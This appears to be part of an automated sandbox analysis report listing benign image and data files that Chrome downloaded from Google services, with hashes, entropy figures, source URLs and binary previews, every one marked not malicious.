                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8164
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.958796570138763
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:P7WZ6e6Dd1Q0GbQkM1ArCUxAf9EMVtM/GU57C2:P7W8h1Q0Gb9r/AlE+cG0
                                                                                                                                                                                                                                                                                          MD5:509AB59C88711D0071CB4AA0BE726BDF
                                                                                                                                                                                                                                                                                          SHA1:30B8F22D9C0EC7F1D119AF2198CBE22994C29EF9
                                                                                                                                                                                                                                                                                          SHA-256:947AB25349EDE3D639E5C45571441E0D970074286795B63B16B141937104AD1D
                                                                                                                                                                                                                                                                                          SHA-512:5EC50CDEB48F37F83D66F82A88094E8FB3514B7A91A67452182951285C4059D9E98723B9A7069C79F81AAC9E6CEDB3D1D14F2DABA5D255E794B4D6401CE2B1B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..}w.\...v.....4.#f.#AH .P@ P ..$...,......-~.]{...v..g.......l.. ,d.L....BBY.:...?n.....==..O_3v..U....9...>.q.Vm...w.ck.c.>nD-&...m-\U[...qO...5,&..._j+9..~....v..cx....%.D.e.$.[..8@...w.H...........F..P..!.=6l......v...U[.J.$..p...M..E..0..E.'.jh.JRY..F....u.._...V].+.^m.*.{_.O.....r...A...1.....`..N....~.}{~....;...T...[7~d..Kj6h. ...t..........s.p.........K./d...`(h.....]...8.8..>.....K.[4.W.u.g.AAS>0.e[>v.WN..qC..D.c.y.a.j.|.....Z..@..?..&:~........%$6'....s.1 .1..y.[...Y......F..9.\.6....Y..p$A+..Z.O$.e..*8...r.s.B.h..8.l......Q.n..?8...h.0...._..c....BLap.L.eB.....>.......]..b....<.{...vt8_.....e#..5.|.~.U...A1.<RV.C..K^..Y.#.V....z.....<....i..U.%.."|...?.[.5..]Bo..!.7..yG..*]..c....?D..C.$\.....L.D<c...N..%oYc.$..c..l....R-..f....2......8MOX....>..v........@..t0"..F.......#4.X4......\-....S.wcB..5.RAE....W........V}.9..{)~...Z.....R.W....w...c............R
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5805
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9542006310437126
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:t9UzyN3uV9rFvd89BSK+b+n3P/WB64548U3zuH1pgD/ln5KCKH:/U2N+V9rj8DSK+bB5DKuH1oln5lq
                                                                                                                                                                                                                                                                                          MD5:D0656A971972F0807AB746BE522ADD05
                                                                                                                                                                                                                                                                                          SHA1:5DEB386A5C5481D9A4AE91E37E175A4E656AE245
                                                                                                                                                                                                                                                                                          SHA-256:C7B0BC63C6F5631DADD177E4EA287231713A0FF78A36213806ACC9BF760A4D4E
                                                                                                                                                                                                                                                                                          SHA-512:6DC7991439E91FF4901ACF4AB19FBFC83A9B9E5CB26ABB9987FA72937C84609407A894806B2E7802419C7A550C7F3075DCE0DA33063705ECC51F8F957A6D3D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....dIDATx..y....?.{o/4K./..(.`.d......8..I.8.3.e.%...8nAt.h.'.8O6......q.lFE.D.PD.f...Uu......t..[....y.~.....U.:...s.D..%J.)Rh.r..*...2M5$..16.5.. .D...E."&....'..=/u.WnK..@P....=Y.*=kf..Vc..F..F9*i..~80..:T..P...A.BU2j.RF....m.........1...<.W.]...S.."=M..:..H...&.z...?...*...H.[RE...*!i...k..".;.'b.6*o".5..$..>...0...9=A.:o.D\..:ew&..Q..w>v].........*....D....H..<.f..^..sF.....3OD......iIk..D..........`w.t.. .pyQ.[..H...)6.c:....F..#.....DE.......V.{...,.'V>.4.......g.8....fnK.c.FD)>a[#.~....=.%..!Y....-.{..._&.0..._V...R......=..2 .nu..7....]..K...PT..nE..mO..y..*lk..X......<.j1.*..%..z..k|.....a[#.U..1..Y.......C>.....w.ra.$...k..'....}yr.?..~....?.....c8.m......y.yj....|..=c.u.}{S...Pm.b...j}J..G>.....E*.^...... ..B.c>u..=..omj..["O...HGe+2.u...H8wn......m..H.6......x.,_.;.;..)z........%q..*$.qj...8....8=.y.. |sW..4.s;-.A....>Y..7Q..e.-:o........s...I..s.,_u.P.....`=c.4..+.%q;...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9833163690494073
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:InjZoS8/ZoS8/ZoS8/ZoSwCR:8ZoS8/ZoS8/ZoS8/ZoSwY
                                                                                                                                                                                                                                                                                          MD5:7F80D3503B6B29EA5B31420B4F0AAA50
                                                                                                                                                                                                                                                                                          SHA1:5530BED025AABFAEAB33B9E29CF7D23C8ADB6EDA
                                                                                                                                                                                                                                                                                          SHA-256:3ED061DFE2DE5EC4B2C1867CCE8AFFE2673FD8E984175D42E49844F621524782
                                                                                                                                                                                                                                                                                          SHA-512:D85C4B1D6F2EC0D1D3E51C8D680B55876C028A40AB46A2DDAC6936F7EC63D88A506A4594032B7A2A842EC4D4089442F5E6A8B9D53BB67CC6B41FE42F99391326
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSLAnol1bptvMzRBIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2hAwec?alt=proto
                                                                                                                                                                                                                                                                                          Preview:Ci0KBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2hAwecGgA=
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1218685
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985161889157195
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:t4RgSVIcqs/SzbqrKGsV/ohv98lLMfazNfuUo+YXerXO74GdHdfPs:SgSVXEohv9cLC+IereUGdHdfPs
                                                                                                                                                                                                                                                                                          MD5:C448B484B859C9CB782A4D33FD4F9495
                                                                                                                                                                                                                                                                                          SHA1:7DEFC9F2DBA95C9A94730318E8527A326376D7F7
                                                                                                                                                                                                                                                                                          SHA-256:A0FC6DC999127147DCA5B65B771DD649DD4192B7D10D0CEEC9A4344E1F56FEB8
                                                                                                                                                                                                                                                                                          SHA-512:CD5901DDA2D6DF069CD1A184948791541F8E3A5159079146035FE0C9BEAF27A80240DED31683089EC6B1A347ED78CC5623925ACAE6A8888152AF5DCB268768A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....sRGB.........eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 16:53:54......................................................2022:09:08 16:53:54..x.b....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exif:ColorSpace>65535</exif:ColorSpace>. <
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):724
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.647982860115714
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/7hXwUFAPF3m6dO27+7ggN6jyBLIELY1xNs0ZskwxaKCaRZk3upGWYyKZwghc7:eQ93m6NSDBUELozxwffk3omRV8J
                                                                                                                                                                                                                                                                                          MD5:98AF63704F8E80F4B8D0F57DD55A37F4
                                                                                                                                                                                                                                                                                          SHA1:51442B648F619AD638616BDC5FA2409A2A5BF751
                                                                                                                                                                                                                                                                                          SHA-256:B755CDB5F2E731B5A3623A38ACA7F33ECEA11107144120C35348E0BB56DD8367
                                                                                                                                                                                                                                                                                          SHA-512:1394D41A33F4ADC3AF12E2054DB8C133737464C6F8A1FF24C0D927B95F7D38AD8D841A96CE9CE927D879DDCB248FC2C81ABD9989C930BCEAFECC93AA599AA250
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh..MH.A....FV[k.....R...B...6...."..R..c.;x+.P.......%T..]....2*.(E.LVV.o:l.........=..}.}.a..>A..m......JE...W.......M[y.B........,D.n..;...WP...[...Q]-{;..H."..Q.8TgK...4K...".U.......{B0+..Sn....sP.+..9(J.~..1.....^f!.RA...{..sE.T.ROyq..UI......s.s....;...&.T@ub].c...M!......p.P(.H.u.z(3...{....TK...B.I..'6......'..0.+.......$.....X.j..F=.I.-h#.....$./.&...e......3....C.R..[.`.._x^>..F.....h...OZ.+..M+..s.4.K..=^.G......ln\.5^4.".!F.....?..}7.S....0..[.....{.F......N$.:..B... .|....o....7#d.3.Ai..b1..5...xf.........8.q.M.-..{\....OZ.S.|..S.<....*.D.. /e:.)....C.u"!..\'.r.H.u..-.,.F<..((..s.!.km>f<..9.(,.7.c..H\......IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):54
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.963130326197479
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:ellPZrkIuOeSWpneh04:e/PZuOIJp4
                                                                                                                                                                                                                                                                                          MD5:81B2E5CD042ED5F7F68A10654F1196DC
                                                                                                                                                                                                                                                                                          SHA1:70C3E179C0E10075460081468EC495553CB60D24
                                                                                                                                                                                                                                                                                          SHA-256:00C7F4E2E06AD6DA632852890B1051AEFA8EAC3FBB46FC2D5E338B24C3E9E868
                                                                                                                                                                                                                                                                                          SHA-512:87731D1EFFDCC4F76EB7BBB79B5EEBEDABEA2C1BEE603E96C9507FEB6EFA02E514FC7FA6AB87078B6EFCA7511B435699C623B825A1077799C78E1765F8AD2A92
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i2!3i7!4i256!2m3!1e0!2sm!3i707457497!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=98160
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L!.../..?...k.7._<....B...'d.D.?...'..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 120x120, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3266
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.852627538876169
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:qt1HKAKySfASN3pxt6fImZlHjlBIsAyZkGpcjT:W4AKFo60gsAIk+cjT
                                                                                                                                                                                                                                                                                          MD5:F68A96B7A1C51CF5159DB73E22597AF4
                                                                                                                                                                                                                                                                                          SHA1:9C7B49A43FEE2EDA51CB554B3D7F6999386C2B76
                                                                                                                                                                                                                                                                                          SHA-256:3E64CB5E301757480594DBF1D52CD5A5129600C0216B526E190A25C1D4263136
                                                                                                                                                                                                                                                                                          SHA-512:FCDF61A2C62B35C5E511ADF2CD7E77B84C76B38F8242CCB19BBC788839C5AE624CF062F2D9279DC46788C4A76A988FDDA1936B53E8743BA4B9E1823D2E2E408E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/PVDn9Oj6dMbqqydywzGuLAPkbLwDX3Uuv1t6K8MORXFuQAVBLPNAy_yaQBc7bE-qmLHCmWThtcuwCFEwJPR_w6SDj_Um1q0FK7vC0w=h120
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................x.x..".........................................B..........................!1..."AQ2aq.....#3Br..$CRbt5S...%c.....................................7........................!1..AQa"Bq......2br....#34R..............?..:R.!)Q.f.)....]<..]..-.......1.(&..K6.......;8.Iwr=.H/ku*........i.H....b.kF:E....Z....i..ox..M....d.H.......k...d.4.jM...l..x7.YYe*..7.@.8..mmn..M.[....}..:#..6..76m......-.|...P......\>l.&....s....W.._ZZv.3e{ms.%c.L.?."D.....sO.u.G#$n..#.7..M*3S_S.JR.%A..4!a.6..t.h..{..6...../h....'8#.joX{ej......'.....T.2?.....o..V.';....$nb..H.W......8,...J......$....3...E...y\.+..7.y].v...O._*T...q.T..R.>...s.W.R...(Jf..JR.!~..(...NU.u#...0#...o..l]kO.I&.|..wd..x.\...i.8.+...[.R..v./-=..q.*.:...M.;~.....yH..DR.....`r..ES.WZ..,.A.aym!?.&M..qB..j.*.......k.........#1....9.tSJR...*.....A.P.O3\.gs....]...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):157918
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6836210703728196
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:5mulSLtF67Ko4YHTmZe1SU1T4XmZfhzmS1ahYa0sbd4JVY07QoLZBdfPb9boA9x4:vlUtPYHyY1Ts2ZfYaJVY0TnbVPuiz
                                                                                                                                                                                                                                                                                          MD5:52C66B9174D4EC5F7EE156345D9660B2
                                                                                                                                                                                                                                                                                          SHA1:6A3339D208884A3C1508E763FBC150FE2A736AE9
                                                                                                                                                                                                                                                                                          SHA-256:5CCF84EFFAB2972ABAE16E8D3FDF38D0F98F30A48110337E1AC1C90621DCEB38
                                                                                                                                                                                                                                                                                          SHA-512:25267A2FC7D584564A501EFC8DB74FB5F70451BF378CE6AC6C56BBF0E8C77D055B27DB8A579E4CE67A2BFF162FF82001DF9FEDF83A8B08CA76B1ED60A59BBDD5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.h..WEBPVP8L.h../.....u!...R...l.Q...1.........(T.P.Y.LG.1.q.cV.!...H..N.s.Df.ID.#.m.<b.k8.....W5...=.R.T.R.TR..........YiL.p.2333...f..{.WO3dBk.....1[v\r.%.._>..9..._X...o$7... "..,..")R..E.J.z.}.z7~N............x?.}.-...!Y,.Y.>2.....k...u=..~..X.d[..+N.N:.I3e.1=....7.2....0..I.$=)....qb[........}..l[U...$.......o;...m$..[...... ..R4.h...G..Q.e.c...i"(.DP..A...@t.zo....]....W.$..z.An.H.D....uw.,!.$G.<......^t.$Hr.6..>..*.h.....m.X.IIN.8....._H..l..3..'.%.......m...mm..?......;.8.....!d......mic.x ..D..L..u....H.{..4........V#...:w...7|?.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1527289
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985866300066576
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:z3YNMeVTLioUPvutg33W3nrAuj0jzLjfyhphHtdRj/BY2QWdpkQ/eVCHQ6ibBojH:0pTGoUPv3WoLcppf1B5Zpj2GvuBoF5rb
                                                                                                                                                                                                                                                                                          MD5:1C08A01BED696941B735B5CCFA98B463
                                                                                                                                                                                                                                                                                          SHA1:C4EA46C64E220E556F67F61944D16D9DA3E9BA64
                                                                                                                                                                                                                                                                                          SHA-256:06F943530528D65ECD7BBAECE3F513B533EC0676C7906BBDB8EE8D810D207CBB
                                                                                                                                                                                                                                                                                          SHA-512:6A2A4392191BAAE8918A86E85CE1F819D480881F9E06430A5C1B99265816FA8BC73C169FD55E3FA85C1A49C87A16CB640E72A60794607B9FCDCE709FD9578755
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....sRGB.........eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 17:20:50......................................................2022:09:08 17:20:50....v....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exif:ColorSpace>65535</exif:ColorSpace>. <
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows cursor resource - 1 icon, 32x32, 2 colors, hotspot @8x8
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):326
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.5620714588910247
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Gl/0puls6M94pTiI+mBURd8EOJlZa8BBL:C0pqs6M94pTJyOZ77
                                                                                                                                                                                                                                                                                          MD5:FEFF9159F56CB2069041D660B484EB07
                                                                                                                                                                                                                                                                                          SHA1:0D0A08CF25A258511957F357B89D3908F3C5E6E3
                                                                                                                                                                                                                                                                                          SHA-256:7342F390B12F636D14E25F698FC5E38CF6240994DC0C07FEFBBB4E78EC4D03C7
                                                                                                                                                                                                                                                                                          SHA-512:F850277F48AC14FA363265469776E6F7F07F7DD743AA1D1AD7CF2329EEE6D323DA3422CF6BAAC066C84ECD24800A02088053EF3FC0488D170E7FC942AC8FFA99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.gstatic.com/mapfiles/openhand_8_8.cur
                                                                                                                                                                                                                                                                                          Preview:...... ......0.......(... ...@...............................................................................................................................?...w...g...............................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1029
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.702778935724778
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:/lVLIecDGAF3h28ysL5lqd26WsKZkZjAG28r5hgt72:9Vse+n28BFwnWx8iy
                                                                                                                                                                                                                                                                                          MD5:C4989F1B2A2A2C78188EE4704B9461F4
                                                                                                                                                                                                                                                                                          SHA1:5B1CDD9F61658A62A2B4D5D91F55A46B9593C2AC
                                                                                                                                                                                                                                                                                          SHA-256:8B4192D2F7725E78C9E4B57F348E7B92A5053E65776BA1AC103C5FD7FA57F45C
                                                                                                                                                                                                                                                                                          SHA-512:1BC0FE45954716223A0EE546BDE2F95E8CB59BCBE08B6AB0A706EF76FE0714BA6411C81309C94CC75F00406D8429CA96830B1A9FE2B2974053B38CA52F541B65
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....IDATx....p4Y.E{.r..-.mo..m.m.m..h.A..~/..z...T.8}nK*...$. .....J....8..r..9...$...{Qxv...'..9..g<;Va./..Qr. _*h.y...............D.Dp.4....e..A..X..f...L..O.x.S#.N.......L...r1........./^...S..U..H....$2.,....fY...b........?r.....h..gz.U......>+.....;.TI.....q......3.Z4......b.q1-E...#.G.....@a..;...x8......V......[5...!,!,.M.Z.0.....5.k..Y$..*......s@Op.'.h..Yn......1r......b(y...]..&.C?.5._....AD.. .....6vP.1..D.K.i.0.9`~.=.d.w...%_.x. ...._8`.s..p..~.3_...*.`..8.\.B......4..8U.,.|..S,:=.".......= j@.....f.{.a.I.0.N......D/.......y......av..L.A...5......{.. .h.L...?.V.....|J.r.0..Kd;..@.....)9.E..1.........(..9.....2.d...h.f-..v<.<}....r.'.P....*jm....-....K...v.AW.._.W..+ nA?D.r.8..V .Z....06........._.....tQ..K....Pu.A..Rn....t.dp......).....G.........@.K)/dY.E......C.}....a...UG..p.s..(.:v.. (.2.y....{..w....`_C3u....K.!...0M:j1a.c5....HM.....^.cDH....O.A...z.......o..W*I\..t9..3.."......w....|
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 255 x 255, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):62355
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.988970516897828
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:axn13EKQRvGGwCzxrt2cspAIw/y5APZRcWfrR0t7:ajEKAzBocQ3w/tRRdi
                                                                                                                                                                                                                                                                                          MD5:53E7443A0314D0C50017C0DA7009C6AA
                                                                                                                                                                                                                                                                                          SHA1:EDCE1BAA4A56C065BB244B195CBC850B6AD57DB9
                                                                                                                                                                                                                                                                                          SHA-256:1F062FC2DE503772111ECB903B23D934BC8001F7CC6C25E54C23BEACD55D4E23
                                                                                                                                                                                                                                                                                          SHA-512:BD3B1E914845B9D08BDC0D546FCEF8F691DB2C69AE0C6C3003E35CA902BEC1BCE477CAF6D5923DE414FD539107260B4E9905D688E5BCEEBF33BBC4F09E9C71C3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/G723MydBoHRVwUpO7w9sZe6TfYCUenXv_B1mP4YhY4JYdKbpzRhdbobPFlJ60If-jIEYt6wxrdS99O1FZ19NaZMinIzE_-yKKpvV96ftdmcGW3WsWfc=-h255-e365-rwu
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............>.......sBIT....|.d... .IDATx..i.e.U...}.}..T.U.U9.R.4.Jh....3....Q@..Z6.p..hC.d;.hc<.6 ..M......m...`..f.$.IHH*.T.T..r|....?.Z{.s.}./_fUeU.....=..=.y}{..nyA..~f.J.r...!.c....t..x@....+.^.k.:.....@....u...^H.%....x..9.<....}<.;.^O.w...<...\G......g>.Gex%..I".a.=H...].%A2....P@.........%'H.."......D. AH..B0...`...". .G.x$u..R>..n.. .....&l.l..2.MV.....x.H...>..I.....$T........HB.......16'.!A.....!......@Z})...Z?S.r.H..R ....H"..y:.~_..Q.......G.z>.t.,/...<..#..f.E..I._.. ......`.....Q...,....aM(....M8......F.~.h..R..$z.t.....9..*.....e..>.,M.n.F.e...S..r._F..|..}.,Hd.......m.M.o?9sN.>.O..D.=..A.."..H8@....S.R-....}.....N.=..$~I.~.[[.Or....>.e....A..z..........2 ..........pU...Q...n..#....0..(.Q.n.x....D.....&M0.G+..p..V...M?f.z....$R.iQ.....{..c.x.e.g..O.z#..J"_Gp..s...-._..1...?.hu..r..7....T...B....=k...\k...l5...&. l.V....b.....6._.gda..N.... ......_wG...^....7.l<..=..........n.\.!zc....GS.....o...........u..J5.R..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x852, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):245622
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999126695216915
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:zErzwzM5hanxGWltPB3DcU/spg3xxH3oY4Km9A782UcMd5lHjJSa:3UhaGA/TcU/sEzXoY4KmAo2UcK5lDJn
                                                                                                                                                                                                                                                                                          MD5:BAC9D7A2E987B16FB55E14522558AF40
                                                                                                                                                                                                                                                                                          SHA1:7805D835705A3BB751CB8B1C3901C23FC037DA75
                                                                                                                                                                                                                                                                                          SHA-256:121ECE0A5A504476A71F509BA2F0F2C2119D80E3FBD209C2F6773945FBF507BE
                                                                                                                                                                                                                                                                                          SHA-512:5224B025FA7D77B67D76E0BA12A0FE560DA001395C090DB0C00F95D0A2519FC245669B2AE2DD43402748455E73117F53C8A836C2964405C31678345296E8BA88
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/f9/59/550513204c95ad78b55ec0d58b28/solar-large.webp
                                                                                                                                                                                                                                                                                          Preview:RIFFn...WEBPVP8 b...0(...*..T.>m,.F."../r....M.^.q.../....[.....W%.......S.o....{..q...O....................?..k?.{.......~.{..{.S.s....=..=...'..V.Q.!.WjOh....W.....?....K..`.,.....G".w._...G.?............`...A...g...............#..X........./..?..L|8.;....P?..D.A.w....7.?.....U.........................?.}..i......G.............?.?.vF....Y..}..x.z..}.9w.L.......g./._.:>m.....#...g.....O._...>....!............._.?.{..>.Y.....................I...K.w.........=.?.v.......m.c.3............X/...Q.....o.7._.?l..=....w.G....=~o.o~.....'.G.l..g....T.w.........../........u......|...0>......s.s.?.......=...*....3../J0+s..s\...#..e.6~......DL....:u|X....v]..h......`.4.z .x?.W...V.:1.f7...1.*.Z......P:.F...4.:....c..)..2N.y.s..h.K.r./M...y.k^.T^g...%.c.f.02.V...Q4....?.gpt........Q..<7........G..fo..........b..............]z...<..3.\.v..7.C@.r..P.jj..,..3L..W.H&..`..Y...H..1....j."...3.g,Q..X..@2.k..8.$..N..BO.........s+..E.V}hU.[.w.._^....BBc(...T..T..k.
